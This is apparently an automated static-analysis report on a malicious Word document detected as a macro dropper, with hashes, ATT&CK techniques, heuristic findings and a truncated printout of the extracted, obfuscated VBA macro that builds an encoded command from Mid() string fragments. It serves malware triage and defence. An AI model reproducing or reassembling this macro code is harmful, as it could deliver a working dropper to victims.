Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d7883d4b95c99c3b…

MALICIOUS

Office (OLE)

Size: 78.5 KB
Created: 2017-11-06 14:56:00
Authoring application: Microsoft Office Word
First seen: 2019-04-17
MD5: 0bd0c327dbbe9787e9a04e91e3a09a2f
SHA-1: 5714582df77ec85303df49f1d280d10bd30e1938
SHA-256: d7883d4b95c99c3bf3d9122b59647ecfe8eba5ddc27e7e4e18a43cae18d43c55
Risk Score: 204

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'OLE_VBA_SHELL' heuristic indicates the presence of a Shell() call, and the 'macros.bas' file was extracted. The ClamAV detection 'Doc.Dropper.Agent-6367164-0' suggests this is a dropper. The VBA script attempts to reconstruct a string using Mid() calls, likely to form a command or URL for downloading a payload, but the full string could not be reconstructed due to truncation.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6367164-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6367164-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 13484 bytes
SHA-256: ef05120737f14fbffd1703109d856bc2ed1745824bad1922d0573533f857f52b
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 27 long base64-like blobs)
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "qiWDlAhDS"
Function Xqckmzkwk()
CDBQozZJhMt = Mid("4dlAS14VSQAxADYANABhADQAMABJADcANQBiADQAMABJADEANQA2AGIAMQA0ADUAdwAxADYANwB3ADXzKot6MdLza84K9mEhz", 9, 70)
jpFFz = Mid("z5cjZAASgAxADYANAA8ADEANgA0ADwAMQA2ADAAdwA3ADIAYgA1ADcAdwA1ADcAYgAxADYAMwA8ADEANAAxAEoAMQA0ADMAUAAxADUANwBAADEANQA1AGz8lCOdRi6zz0IszC45YicO", 6, 112)
UkjCIcvTHHS = Mid("5RaOwjlQ2WozvWFZm7BoADQAMABQADEANgAyAEAAMQA0ADEAdwAxADUANgA8ADEANAA0AEAAMQA1ADcAeAAxADUANQBJADcAMwBhADQANABQADEANgA1AEAAMQA2ADIASgAxADUANAA8ADEANgAzAGIANAAwAGgANwA1AEAANAAwAEoANAA3ADwAMQA1ADOADhnw9ardjM", 19, 172)
lasjnQz = Mid("ImR5Wr7qJpvidTvaiCaZwJOgA6AFQATwBpAG4AdAAxADYAKAAgACgAIABbAFMAdABEpHkoJf7i", 23, 43)
MiHQjFPImm = Mid("L1jzDcxADUASQAxADQANQA8ADEANgBjm7D2AM", 7, 23)
wHPfqCdrSjq = Mid("1QANQBKADEANQA0AGIAMQA0ADUAeAAxADQAMwBKADEANgA0AEAAMQA2ADIAeAAxADUANwBhADEANQA2AGgAMQA1ADEAdwtKonkudjAHjO", 2, 92)
BaidKoznqYT = Mid("FkANAA1AFAAMQA1ADMAeAAxADUANAB3ADEANQA3AGIANQA2AGEAMQA0ADMAYQAxADUANwA8ADEANQA1AEkANQA2AEAAMQA2ADimrwvStaCowa5lcG", 3, 95)
jcAIjiRI = Mid("ZdpCJiN79nKz8F2sb0607qgA2AEoANgA1AEoANgA1AHgANgAzAGEANgA2AGIANQAxAEkANwAzAEoANAA0AHcAMQA2ADAAYgAxADQAMQBAADEANgA0AEAAM35uWrWjS", 23, 96)
qkhDGPiaMq = Mid("lkzW8NCLFd3ADEANAAzAGgAMQA0ADEAeAAxADYANABhADEANAAzAGEAMEK7", 11, 46)
HjpGJcK = Mid("dO9wBIACAAewAgACgAIABbAEMASABhAHIAXQAoACAAWwBDAE8AbgB2AEUAUgBUAF0ACI9zN9Hkkpmt8", 4, 63)
zVwRYo = Mid("7J68Xwo835HQ9pmffE9DUANgBAADEAMgAzAEoAMQA2ADAAYgAxADUANABAADEANQAxAGIAMQA2ADQAeAA1ADAAaAA0ADcAQAA1ADQASgA0ADcAPAA1ADEAYQA3ADMAQAA0ADQAPAAxADUANgBQADEANAAxAEoAMQA1ADUAYQAxADQANQBKADQAMABiADcANQBQADQAMABJADQANAB3ADEANgAjSEU", 20, 198)
UIpTFLDX = Mid("h8nUASQAxADQAMQB3ADUANwBJADEAMgAzAGEAMQA3ADEAeAAxADYAMABAADUANwBiADQANwBJAGdNDpOs", 4, 71)
iWtFEvM = Mid("Rz3bfAxADQAMwBAADEANgAwAGEAMQA1ADQAeAAxADQAMQBAADEANwAxAGgAMQA0ADcAaAAxADYAMgBhADEANQA3AEkAMQA2ADUAYQAxADUANgBAADEANAA0AHcANQA2AEkAMQA0ADQAdwAxADQA4pwQ8MM9JcX3iXu50", 6, 142)
WMLtaAV = Mid("udllJCvhiTZt9uwQjZpidwwRXvwC2ANQB3ADEANgAzAGIAMQA2ADMAdwA0ADAAaAAii", 30, 36)
winRXhncMio = Mid("ct7KjWAAxADMttu4rQjv32pGcwOnOij4Kj5R", 7, 6)
jfpuKIYRcLY = Mid("W3ULdphnn2fOWSnRM9A9E0XC6TxADQAMQBQADEANAA3AEoANQA2AHcAMQA1ADYAQAAxADQANQA8ADEANgA0AEoANQA3AGEDBMIIS42HjDEB", 27, 68)
kULjob = Mid("qZMIfBZv8JRGTiTO6ADEANgA0AGIAMQA0ADEAYQAxADYAMgB3ADEANgA0AEAANQA1AEAAMQAyADAAeAAxADYAMgB3ADEANQA3AHgAMQA0ADMAYgAxADQHmp", 18, 99)
ziskBwcYV = Mid("6sT67sbBANQA2AGIAMQA2ADQAUAA1ADYAYQAxADAANABhADEANQA3ADwAMQA2ADcAeAAxADqrpq7w8j7KJ", 9, 63)
OCHCERXj = Mid("TIwP6Em6TaHrKLazBJwXrFSI71L0d6LXhDUAdwAxADYANABQADUANgBhADEAMgA3AGgAMQA0ADUAYQAxADQAMgBKADEAMAAzAEkAMQA1ADQAUAAxADUAMQAFVm", 34, 86)
pQTsnHKt = Mid("mDKo3s4Fk1XmrUEiPjJ6jQ8UANQBQADEANQA3AEAAMQA0ADIAeAAxADUAMgA8ADEANAA1AHcAMQA0ADMAYgAxADYANAzkQ8siII0", 24, 68)
zizdMjlL = Mid("Ji7p1BirwlRcpNBobAMQA1ADIAeAAxADYAMgBJADEAMgA0AHgAMQA1ADYAPAA1ADcAYgA1ADQASQAxADUAMABhADEANgA0AGIAMQA2ADQAPAAxADYAMAA8ADcAMgBKADUANwBAADUANwBKADEANgAzADwAMQA2ADQAQAAxADQAMQB4ADEANQA0AHgAMQA2ADMASQAxADYANABiADEIBz4oiV958rYDjB", 18, 192)
KNzXiJtSdNM = Mid("lz34gAMQA0ADEAYgAxADYAMgBKADEANQA3AEoAMQA0ADMASQA1ADYAPAAxADQAMwB3ADEANQQ0l6HjIKEWQj0O4tDjTLA0o1EMF", 5, 68)
wJGEv = Mid("E2YTzLUUbM87AEANQAwAHgAMQA2ADQAYgAxADYANABJADEANgAwAFAANwAyAGEANQA3AGIANQA3AHcAMQA2ADMAYQAxADQANQBoADEANAAyAGIAMQA0ADEMGwNl4YtaTYH7ZE", 14, 105)
WRLWOFtiR = Mid("wb2FziEHA0ji3lPADYAafb7TYo5RAChYthv", 16, 5)
KAUDZsACnF = Mid("AUl6MNIlHA3AHgAMQA1ADUAdwA1ADcAUAAxADUANgBoADEANQAyAEoAMQA0ADYAaAAxADYANABiADEAMgA0AGEAMQAyADAAYQAxADUAMwBKADEAMAA2AEkANQA3ADwANQA0AGIAMQA1ADAASgAxADYANAA8ADEANgA0AGgAMQA2ADAASQA3ADIAaAA1ADcAYQA1ADcAYgAxADzZMvMoprmZXNYTwVVr", 10, 196)
vFuMfNmR = Mid("AEn6JOdTKPvJW5IABbAHMAdAByAGkATgBHAF0AOgA6AGoAbwBJAG4AKAAgACcAJwAgACwAIAAoACAAJwA0ADQAYgAxADYANwBhADEANgAzAGgAMQA0ADMAdwAxADYAMgBhlK", 15, 116)
DwTBbrLMA = Mid("v1jAAxADQANQBJADEANwAwAE
... (truncated)